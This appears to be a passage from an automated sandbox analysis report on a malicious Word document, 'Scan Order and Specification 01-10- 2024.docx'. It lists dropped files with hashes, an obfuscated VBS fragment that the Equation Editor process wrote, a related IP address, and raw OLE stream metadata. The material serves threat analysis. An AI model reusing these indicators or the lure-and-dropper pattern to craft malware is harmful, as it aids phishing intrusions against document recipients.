                                                                                                                                File Type:Generic INItialization configuration [misc]
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):154
                                                                                                                                Entropy (8bit):4.959902543844779
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:bDtSWnJYVmKxeUyeScVJywT4/vfBpXVomxW9TLCJywT4/vfBpXVov:bAeYVCU8qcHJ3OTLUcHJ3y
                                                                                                                                MD5:1B3CE7ED74C5116826E7178331FB014C
                                                                                                                                SHA1:4C8AD6049E4D20953EE13C5D7254D2F074BB9031
                                                                                                                                SHA-256:DADCF6480790DEA0F570977C548A8454B468F13BF33E212A11CE63D452F9E13C
                                                                                                                                SHA-512:D04E1598AC1A7E5856C1EB5620D0A812E66085C10FB74EAE483AB071A8CB0A423DB8EF826EF71D1DBC227FC8B7D9AD11E1ACEDE272FF60D92F6119EF8FC0C58F
                                                                                                                                Malicious:false
                                                                                                                                Preview:[folders]..9aubsm.url=0..RN on 104.168.7.8.url=0..Scan Order and Specification 01-10- 2024.LNK=0..[misc]..Scan Order and Specification 01-10- 2024.LNK=0..

                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):162
                                                                                                                                Entropy (8bit):2.4797606462020307
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                                                                                                MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                                                                                                SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                                                                                                SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                                                                                                SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                                                                                                Malicious:false
                                                                                                                                Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                                                                C:\Users\user\AppData\Roaming\niceworkwithpcitureupdateson.vBS

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):256672
                                                                                                                                Entropy (8bit):3.748947235455245
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:Nq4GRwdiKr3UfoJzrtFPZcMRQml/qJ1sZh7ryvESig:Nq4GCiKQfoJvPOnmlCJ1oh7+vDh
                                                                                                                                MD5:09386235B48255A0B5B5EE106428A9DD
                                                                                                                                SHA1:AAED31297121E1FCE8222D417EF8BC90471AF3DE
                                                                                                                                SHA-256:5E78D2BAED8277AFF8D71F752F4CA00621B6B487A022A942383883A6791364D2
                                                                                                                                SHA-512:760E43B96EA2D455B414ED9FBCEB6B4BA3CF264E9B86015327DB20E3F1ECFEB5210738C9543C26B0CA270FE92170932ADD452E9935CCD218A65FE76918BB3051
                                                                                                                                Malicious:true
                                                                                                                                Preview:..U.U.L.G.m.c.R.j.Q.N.W.K.p.W.m.k.P.L.W.P.i.n.L.W.h.o. .=. .".k.A.f.z.N.C.K.j.K.G.n.L.B.P.f.e.s.k.S.W.L.K.n.G.c.e.".....A.K.L.a.n.i.e.b.i.U.L.K.b.n.G.B.i.L.K.r.u.m.L.B.W.G. .=. .".S.R.t.G.P.f.i.k.u.l.W.K.W.u.I.v.R.m.N.H.h.C.C.p.k.L.".....H.G.L.P.U.i.z.c.L.P.C.W.q.W.L.x.k.P.e.n.m.R.j.L.k.e. .=. .".W.P.m.c.L.o.T.K.d.U.N.b.L.K.k.L.K.v.W.K.R.N.W.l.T.p.".....i.h.d.j.U.C.o.K.K.A.e.W.v.f.f.G.I.o.q.K.L.G.A.G.A.d. .=. .".Z.e.h.N.e.x.L.g.i.k.C.W.m.W.C.B.l.e.R.z.l.e.x.c.h.B.".....i.W.C.c.P.W.Z.x.H.W.U.e.b.T.p.h.W.e.d.p.e.K.c.k.i.K. .=. .".f.P.d.P.h.W.c.c.h.e.l.R.W.h.K.G.N.U.W.W.e.k.A.r.U.K.".....c.d.K.o.O.p.k.J.o.G.W.K.N.x.Z.L.m.t.W.H.Q.t.W.e.e.m. .=. .".L.L.c.p.A.Z.G.m.l.G.W.Z.a.m.c.t.e.g.L.b.e.G.K.o.r.m.".....Z.L.z.p.L.W.h.G.f.d.b.m.L.G.W.P.G.q.t.d.R.u.W.L.U.a. .=. .".i.N.c.c.z.L.W.G.e.o.e.h.l.z.B.m.P.W.t.L.K.L.W.z.p.L.".....p.e.n.z.U.U.L.N.W.P.h.j.e.H.e.J.e.G.i.o.U.b.e.f.q.K. .=. .".e.f.W.h.z.S.O.t.O.W.u.L.W.m.H.P.R.n.A.Z.h.e.W.U.P.a.".....O.p.h.K.p.i.Z.o.l.A.U.L.f.q.i.O.z.U.c.b.i.L.K.W.k.c. .

                                                                                                                                C:\Users\user\Desktop\~$an Order and Specification 01-10- 2024.docx

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):162
                                                                                                                                Entropy (8bit):2.4797606462020307
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                                                                                                MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                                                                                                SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                                                                                                SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                                                                                                SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                                                                                                Malicious:false
                                                                                                                                Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                                                                Static File Info

                                                                                                                                General

                                                                                                                                File type:Microsoft Word 2007+
                                                                                                                                Entropy (8bit):7.994740954983637
                                                                                                                                TrID:
                                                                                                                                • Word Microsoft Office Open XML Format document (49504/1) 58.23%
                                                                                                                                • Word Microsoft Office Open XML Format document (27504/1) 32.35%
                                                                                                                                • ZIP compressed archive (8000/1) 9.41%
                                                                                                                                File name:Scan Order and Specification 01-10- 2024.docx
                                                                                                                                File size:788'500 bytes
                                                                                                                                MD5:fe8c8dbd1f4b4fa2023fe185c8ed9df0
                                                                                                                                SHA1:5988ab649d7bb7f0d3886027f22effb94f9869cd
                                                                                                                                SHA256:1acb6c95b780cceb7eab5a679c73e2c22b8e6550454164d2febb6b8b3a5094b5
                                                                                                                                SHA512:57a700141c5897a54959ff2a4da7fc867c295a48ba646d06bdcf548cd84f7fd88034da658373628a99c6f6447fa582e7f3b2d63046dd0a3ebff6f7547d030522
                                                                                                                                SSDEEP:12288:zNCgJClLmC6lGm0LpsjYJ46gvycWL5c7PasQB2i4MYJv/u8XdyAxd6mzoGftSr1Q:z7ClGL0CjY7EDWQisQB2tXuadyZGwr1Q
                                                                                                                                TLSH:FBF423A8E49ADDB78E66B0B3C251A47CF6B4EEFC0A45889375FD0344954F9A0F0D418E
                                                                                                                                File Content Preview:PK..........AY+..0............[Content_Types].xmlUT......f...f...f.V.j.@.}/.....i..J)....c.h.....%.7v&......SL".../.bu.3s4hu.;[<A...Z,..(..`:.....o.GQ )o...j.......V...X0.c-Z..IJ.-8.U......)....Q..j..z.. u...J..b....Rg..S..+.:.9$#.......N...\.....vZ...O..

                                                                                                                                File Icon

                                                                                                                                Icon Hash:65e6a3a3afb7bdbf

                                                                                                                                Static OLE Info

                                                                                                                                General

                                                                                                                                Document Type:OpenXML
                                                                                                                                Number of OLE Files:2

                                                                                                                                OLE File "Scan Order and Specification 01-10- 2024.docx"

                                                                                                                                Indicators
                                                                                                                                Has Summary Info:
                                                                                                                                Application Name:
                                                                                                                                Encrypted Document:False
                                                                                                                                Contains Word Document Stream:True
                                                                                                                                Contains Workbook/Book Stream:False
                                                                                                                                Contains PowerPoint Document Stream:False
                                                                                                                                Contains Visio Document Stream:False
                                                                                                                                Contains ObjectPool Stream:False
                                                                                                                                Flash Objects Count:0
                                                                                                                                Contains VBA Macros:False
                                                                                                                                Summary
                                                                                                                                Code Page:1252
                                                                                                                                Title:
                                                                                                                                Subject:
                                                                                                                                Author:91974
                                                                                                                                Keywords:
                                                                                                                                Template:Normal.dotm
                                                                                                                                Last Saved By:91974
                                                                                                                                Revion Number:4
                                                                                                                                Total Edit Time:1
                                                                                                                                Last Printed:2024-07-15 15:30:47
                                                                                                                                Create Time:2024-09-30T08:11:00Z
                                                                                                                                Last Saved Time:2024-09-30T08:12:00Z
                                                                                                                                Number of Pages:1
                                                                                                                                Number of Words:0
                                                                                                                                Number of Characters:0
                                                                                                                                Thumbnail:(n-&" WMFCX >l"^ EMF>)8X?F, EMF+@xxF\PEMF+"@@$@0@?!@@!"!"!"!"!"!'%&%"6"%Ld"""!??%6#%Ld""!??%,6#,%Ld,",,"!??%B6#B%LdB"BB"!??%[6#[%Ld["[["!??%6#%Ld""!??%6#%Ld""!??%6#%Ld""!??%6#%Ld""!??%6#%Ld"!??%"6%Ld""!??%"6"%Ld"""!??%|6|%Ld|||!??%6%Ld!??%6%Ld!??'%Ld!!!??%%6"%Ld!!!??%6%Ld!??'%(&%6"%Ld! !??%6%Ld!??'%(&%6"%Ld! !??%!6!%Ld!!!!??!bK!;$$==V(X(($$AA<C%'%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%(%""RpArial w< @XT!%l*w-atQml*w(X`tQ@X/~ZTX/~Z[dX{/~Zl*wO/~ZLZI/ |Z)1I/T!%M"*< M"*/*HX+w9Y+w`Y+wdv%'A>TT+UUA&ALP1TT/AUUA&A/LP2TTHZUUA&AHLP3TTqUUA&AqLP4TTUUA&AyL"P5TTUUA&ALP6TTUUA&ALP7TTUUA&ALP8TTJTUUA&AJLPATTUUA&ALPBTTr}UUA&ArLPC%%"!%'A>#'%Ld#B"B(C!??'%(LdJ!??&WMFC>'%(LdJ!??'%(Ld"(!??RpCambria w< T!%l*w2atQml*wF`tQ/F!F/!Ft"{/!*wO/!!I/ !L}I/T!%P"< P"a#/P"$ +w94!@ F+w Fdv%RpCambria w< T!%l*wKatQml*w^=`tQ/^=!^=/!^=t"{/!*wO/!!I/ !XI/T!%P"2< P"2a#/P"1$ +w94!@ ^=+w ^=dv%Rp Calibri w< T!%l*w#atQml*w,`tQ/,!,/!,t"{/!*wO/!!I/ !I/T!%P",< P",a#/P"+$ +w94!@ ,+w ,dv%T|&lUUA&A&L\N ordreTdUUA&ALTDATE%%%"!%%TUUA&ALtSOLDE AU 02/01/2024Rp Arial w< T!%l*w-atQml*wX=`tQ/X=!X=/!X=t"{/!*wO/!!I/ !I/T!%P"< P"a#/P"$ +w94!@ X=+w X=dv%%%%"!%%#C[T$CYUUA&AC$LWORMS ALGERIE SHIPPING SPA (WALSHIP)%%%"!%%#\TUUA&A"^LtCaisse Annaba - 2024%%%"!%%TUUA&AL|LIBELLES / DESIGNATIONS%%"!%%#%%"!%%'%((&%"6"B%Ld""A",!??%|6|B%Ld||A|,!??%6B%LdA,!??%6B%LdA,!??%|6|%Ld|||!??%6%Ld!??%6%Ld!??'%(&%"B6"%Ld"B""B!??%|6|%Ld|||Q!??%6%LdQ!??%((&%"6%Ld""!??%",6,%Ld",,",!??'%(&%#B6B%Ld#BB#B!??%#6%Ld##!??%#6%Ld##!??%#6%Ld##!??%#6%Ld##!??%#6%Ld#!??%(%"!%#%"!%'%%6%Ld!??%6%Ld!??%"Q|P(x( F4(EMF+*@$??FEMF+@''',',',--""-@!"-#-@!"-,,#-@!",-BB#-@!"B-[[#-@!"[-#-@!"-#-@!"-#-@!"-#-@!"-#-@!"-"-@!"-""-@!"-||-@!|--@!--@!-@!!--"-@!!--@!--"-@! --@!--"-@! -!!-@!!,---$----$----$----$----$----$----$----$----$----$----$----$----$----$---''Arial-'A>212/22H32q42y"52627282JA2B2rC-"System-'-'A>,#-@!C(B"-@!J-@!J-@!("Cambria-Cambria- Calibri-2&N ordre2DATE---'--,$2SOLDE AU 02/01/2024 Arial----'--,[C#=2C$WORMS ALGERIE SHIPPING SPA (WALSHIP)---'--,\#%2^"Caisse Annaba - 2024---'--,*2LIBELLES / DESIGNATIONS--'--,#--'--,--"B"-@!,"-|B|-@!,|-B-@!,-B-@!,-||-@!|--@!--@!--B""-@!B"-||-@!Q|--@!Q--"-@!"-,",-@!,"--B#B-@!B#-#-@!#-#-@!#-#-@!#-#-@!#-#-@!#--'-,#-'-,---@!--@!-'#A(
                                                                                                                                Creating Application:Microsoft Office Word
                                                                                                                                Security:0
                                                                                                                                Document Summary
                                                                                                                                Document Code Page:1252
                                                                                                                                Number of Lines:1
                                                                                                                                Number of Paragraphs:1
                                                                                                                                Thumbnail Scaling Desired:false
                                                                                                                                Company:Grizli777
                                                                                                                                Contains Dirty Links:false
                                                                                                                                Shared Document:false
                                                                                                                                Changed Hyperlinks:false
                                                                                                                                Application Version:12.0000

                                                                                                                                Streams

                                                                                                                                Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                                                                                General
                                                                                                                                Stream Path:\x1CompObj
                                                                                                                                CLSID:
                                                                                                                                File Type:data
                                                                                                                                Stream Size:114
                                                                                                                                Entropy:4.25248375192737
                                                                                                                                Base64 Encoded:True
                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                Stream Path: \x1Ole, File Type: data, Stream Size: 20
                                                                                                                                General
                                                                                                                                Stream Path:\x1Ole
                                                                                                                                CLSID:
                                                                                                                                File Type:data
                                                                                                                                Stream Size:20
                                                                                                                                Entropy:0.5689955935892812
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                                                                Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                Stream Path: \x3EPRINT, File Type: Windows Enhanced Metafile (EMF) image data version 0x10000, Stream Size: 55488
                                                                                                                                General
                                                                                                                                Stream Path:\x3EPRINT
                                                                                                                                CLSID:
                                                                                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                Stream Size:55488
                                                                                                                                Entropy:3.128894440734097
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:. . . . l . . . . . . . g . . . . + . . . . . . . . . . . . . f . . Z G . . E M F . . . . . . [ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ K . . h C . . F . . . , . . . . . . E M F + . @ . . . . . . . . . . . . . . . . X . . . X . . . F . . . \\ . . . P . . . E M F + " @ . . . . . . . . . . . @ . . . . . . . . . . $ @ . . . . . . . . . . 0 @ . . . . . . . . . . . . ? ! @ . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                Data Raw:01 00 00 00 6c 00 00 00 00 00 00 00 67 00 00 00 0d 2b 00 00 db 0c 00 00 00 00 00 00 00 00 00 00 66 b6 00 00 5a 47 00 00 20 45 4d 46 00 00 01 00 c0 d8 00 00 5b 07 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec 13 00 00 c8 19 00 00 d8 00 00 00 17 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 4b 03 00 68 43 04 00 46 00 00 00 2c 00 00 00 20 00 00 00 45 4d 46 2b 01 40 01 00
                                                                                                                                Stream Path: \x3ObjInfo, File Type: data, Stream Size: 6
                                                                                                                                General
                                                                                                                                Stream Path:\x3ObjInfo
                                                                                                                                CLSID:
                                                                                                                                File Type:data
                                                                                                                                Stream Size:6
                                                                                                                                Entropy:1.2516291673878228
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:. . . . . .
                                                                                                                                Data Raw:00 00 03 00 01 00
                                                                                                                                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 248
                                                                                                                                General
                                                                                                                                Stream Path:\x5DocumentSummaryInformation
                                                                                                                                CLSID:
                                                                                                                                File Type:data
                                                                                                                                Stream Size:248
                                                                                                                                Entropy:2.7990677635209242
                                                                                                                                Base64 Encoded:True
                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C a i s s e 2 0 2 4 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . .
                                                                                                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 a4 00 00 00
                                                                                                                                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 23536
                                                                                                                                General
                                                                                                                                Stream Path:\x5SummaryInformation
                                                                                                                                CLSID:
                                                                                                                                File Type:data
                                                                                                                                Stream Size:23536
                                                                                                                                Entropy:3.0728310684122637
                                                                                                                                Base64 Encoded:True
                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . [ . . . . . . . . . . P . . . . . . . X . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t C o r p o r a t i o n . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . @ . . . . c ? . @ . . . . F ` . . . . . . . . . . . G . . . Z . . . . . . . . ( . . . . . . . . . . n - . . . . . . . . . .
                                                                                                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c0 5b 00 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 78 00 00 00 12 00 00 00 88 00 00 00 0b 00 00 00 a0 00 00 00 0c 00 00 00 ac 00 00 00 0d 00 00 00 b8 00 00 00 13 00 00 00 c4 00 00 00 11 00 00 00 cc 00 00 00
                                                                                                                                Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 28134
                                                                                                                                General
                                                                                                                                Stream Path:Workbook
                                                                                                                                CLSID:
                                                                                                                                File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                Stream Size:28134
                                                                                                                                Entropy:4.264894359698655
                                                                                                                                Base64 Encoded:True
                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . # . 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . . . .
                                                                                                                                Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                OLE File "Scan Order and Specification 01-10- 2024.docx"

                                                                                                                                Indicators
                                                                                                                                Has Summary Info:
                                                                                                                                Application Name:
                                                                                                                                Encrypted Document:False
                                                                                                                                Contains Word Document Stream:True
                                                                                                                                Contains Workbook/Book Stream:False
                                                                                                                                Contains PowerPoint Document Stream:False
                                                                                                                                Contains Visio Document Stream:False
                                                                                                                                Contains ObjectPool Stream:False
                                                                                                                                Flash Objects Count:0
                                                                                                                                Contains VBA Macros:False
                                                                                                                                Summary
                                                                                                                                Code Page:1252
                                                                                                                                Title:
                                                                                                                                Subject:
                                                                                                                                Author:91974
                                                                                                                                Keywords:
                                                                                                                                Template:Normal.dotm
                                                                                                                                Last Saved By:91974
                                                                                                                                Revion Number:4
                                                                                                                                Total Edit Time:1
                                                                                                                                Last Printed:2013-03-25 17:07:30
                                                                                                                                Create Time:2024-09-30T08:11:00Z
                                                                                                                                Last Saved Time:2024-09-30T08:12:00Z
                                                                                                                                Number of Pages:1
                                                                                                                                Number of Words:0
                                                                                                                                Number of Characters:0
                                                                                                                                Thumbnail:u22!v!A vv(vbmmlmlkLLLtttIIIPPPgggKKKCCCRRRMMMaaaLLLBBByyyzzzlllDDDEEEmmm>>>LLLGGGDDDooo===xxxxxxkkkCCCFFFbbb~~~===KKKFFFYYYAAA<<<xxxxxxeee;;;yyy555DDD>>>???KKK333xxx|txxxyyyUUUPPP\\\XXXSSSTTTxxx98"ipnxxxxxx[SD'0#xxxxxx45!xxxxxx\UEHQFxxxxxx7<%xxxxxxxxxxxxxxxxxxxxx{{{rpmpkgwvuywvxutkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihljilkjkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihnkjzzzxxxxxxxxx{vy~yxxxgggutuikmhfejjkUTUxxwnmnabdkii^^`ihiyww]]]jii]]_ihicbd^]]NNNbaawxyaaausrwwxmmm\\]ihhzxxssstrq\\]ihh{yyrrrzxw^^`;:;\\\tssqqq|zy{{}```TTTNLMcbcmmmyyyutsgggtsthjlgdcbcdmjjONPcceedekhhZYZkjjaacedepnnkkm```PPPPNN`aamkjrrrsts``bfefkhhZYZlllxxx;9#NVQ58"w~}xxx# ABF469B@@/02{yxQRTyxyzxwLLNC@?UWYzyz{{|QQT??A WXZ~~||~SQPxwyyxwZWVy{}(&&9<?,.2:76sstjhh&')MJIwxz# opqLMOnmmwvwWUSIIJomm #VSRfgi?<=xxx16"4.mxtxxxDBAKMOQNNrtw^[Zyvu\]`fcbvtr789ifewus/01-// UVW866PPQ%#"<<>B@?~KIHBDG300@@A89<**-(&&<98,,.ba`xvu-++!"%CCFxxx98"nvktod17#xxx422;<>#!!JLN568igf@@CJHHOLKprt\YX}zx?>=```\YWJLNgecBDFKKKXXXqooz{}?ACIJM;98323%$&yz|00164478:$""ACF))+<=?**-'%%A><igfpnm'%$ijj}{{124!""%DDGxxx33 }xxx HJL# rsudfh1..IGGhjmLLO:87SPOVWZ -./**,Y[]965dehIJLB@?^^aggi/--wy{[[^ljh>@CROM .,*/02}|VVW%"!>?@daaddf310*+-@?@xxxB=,FNExxxmoq#"$utt579)'&446nnm(()446OPP&$$333AAAecb223OOP/---./ppnAAB_\[hhi99;___0/1PPQ1//,-.rqq??@nlj--.PPQ1//+,-srr==>ywv224srr>>?sqphikBA@rqr,))mmoCBBpqq-++egi"!#yww247&#"}}~997||~433MNOHHH***"!"LLMEBBKKMIII1/0GGJ]\[\\\B@?tsrRRTHHHHIJJJJ'&&%$$EEEeccxxx}pFG1lujxxxxxxxxxxxxxxx{{{spmojewvuusrzzz{{{DDE)),GGGxxxxxxDCC569IHH#$&FEExwxvuutttxxxwvv|{|RRSxwxxxxxxx@B3om[RYNxxxYY[!!#PMMILNDEH ZZ[KJI>=?poo>>A#!"XXYJIHbbd''([XWqrt\[\[[[42330/%&)jjk1.-468nor,,/<;:cehWX[kjhtuv_^^)((>?A357#! ddf`aa<<;LKL423]^^srqDDF:88\[[pnmRQOTTVb_^YXX'%&125.-,TTUONN667QPP;<=xxx78!kmqxxx;<?uwx,++cbbJKMfcbJKNWTSYWUnnnWTSbdf~|zVWZ$%((%%qrt]YXTUXtuxC@?nor !$-*)&')mmmonnxxx17"xxxllotqp^\[`bc.,,a^]^`aoor:87hedNOSZWVIFEgghKHG]_aGHJ]^a#$' !pmkkln><;wxxVUU(%%310?=<tuy,))jihVYY%##YYZLJJRRSUSSxxxlhXWYJacRxxxomlQSVeeg:88aad88:#! LKL866RSU "kihmmnooo'%'gghTRP?>?xxxwts_acNNQLMOVY[;<?!~}~~klnlln:9:QPP78;WUTmmn^[[dehY[](&'lll+)+qppXYZB@@HIK**,BA@xxx/.:>>xxxoVWYyxy_`bZ\^nlk'(+noqxxxXUCTWJxxxt!!!c``;<>:87'')QNN%%&a^^>?A!XVV78:TUW533ZZ[PQS112WTTSSVxxxxxxV[zyzonoqqs~}~ono~~jikywxyxw~~kklxxxxxxu{{{}}}neutrtrprcsqnplhVk|||[Uxxxxxx{}xxxX[WxxxjU879YXXsrsFEE444ZYXIJLWTT544989ONMA@@<<>ca_WY[EDBdcfppp[[\}~656YYZ;9:>>?zxvLMPMJIZ[\ECDxxx`^I(-"xxxn[Z[DA@ddey{}336><<88:|}aac}434!fdcA>=_adxxx:=)dcM.3#xxxA?>*)(wvv&%(LLKDA@YXXnnp@ACVVV{}xxx52"lssn#xxxobPQS_]]JHGwwySSULKK((*ZY[mmoHIKWWY! rtvxxx).87(+0(xxxsqhecTQO*''ffhtssbcdMJI`adxxx]WJ?B&%xxxlYjkm[[[>?@URR245JJIAABECCA>=cef532532llnNMM>?@RPOOPR222xxxxxx{V}Do7[-X*Z%T+`-b7tG^u}pxxxxxxU`-E1~y}|{y{~{|(09J&fD|d]A=|||gK8gCtWi%@(~}#& ~$"~}!!z} {~ -+tsqrol(~!")<P#a6t?o:o;`/O$:/#~zx#" ~!!|#"" # !$$%$"%LEf\trpqmi\C}" $~|}{#x $~!~~|}" #!"~""!""#%~v|||!#$!#" $!}#%!!} ~ ~~ !wbpxxxxxxP0 """ z~$ |~vz}w|~%"`fUSxxxWWEnn[xxx}} %~|~ ! ~}#L8szkA-| IGvn<>@0.-'&'vvv//0()+ZVU((*oml013=:9014976nor%$$\\^YXXaaa/-,ZZ[))+ZYXaacIFF778CCEmoq+*+**,A?>vvvECC !YXWddeECCCEG0--MOQ?==yyz)*+URQlnp))*mkjOQS***ttsBAB{zz^`c+**z{}.--FFHllkFFGzyy79;<98568CB@ACE210wxx)((DFH/,,xxx6:#xxx<|~!uz~z}"!{o^ob~|0VT57:iff569$"!mkjbcf.+*ijl457645TUY|z{uvy?=<MOQ:88zwumorIJMstw^[Z./22//z{}/03$! wy{9;>IHItrqJLNPQSxxx/4"xxxb }{x~}#|n|!%lACFbaa332wut632('*PON^[Z>@B ddf%##(''ZZY)''y{|(&% \ZZ_abigfVXZCAA}zxGFFYYXsuxEDE:::USQecbHIL<>ATUUHJM&&'NLLxxxZUE=A([c_xxx6~"~!~~|!,#~! !w|[e=?BEDCife 743TUVCBCGHJ655557:76))+RSUlji124NPSFDD~{yOPR
                                                                                                                                Creating Application:Microsoft Office Word
                                                                                                                                Security:0
                                                                                                                                Document Summary
                                                                                                                                Document Code Page:1252
                                                                                                                                Number of Lines:1
                                                                                                                                Number of Paragraphs:1
                                                                                                                                Thumbnail Scaling Desired:false
                                                                                                                                Company:Grizli777
                                                                                                                                Contains Dirty Links:false
                                                                                                                                Shared Document:false
                                                                                                                                Changed Hyperlinks:false
                                                                                                                                Application Version:12.0000

